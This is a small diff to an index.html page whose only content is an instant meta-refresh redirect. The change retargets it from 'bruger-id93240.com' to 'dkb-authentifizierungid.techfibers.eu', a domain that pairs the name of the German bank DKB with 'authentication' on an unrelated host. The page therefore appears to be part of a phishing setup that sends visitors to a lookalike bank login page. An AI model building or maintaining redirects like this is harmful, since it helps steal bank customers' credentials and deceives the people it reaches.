--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <html>
 <head>
 
-    <meta http-equiv="refresh" content="0; url=https://bruger-id93240.com/home">
+    <meta http-equiv="refresh" content="0; url=https://dkb-authentifizierungid.techfibers.eu/">
 
 </head>
 
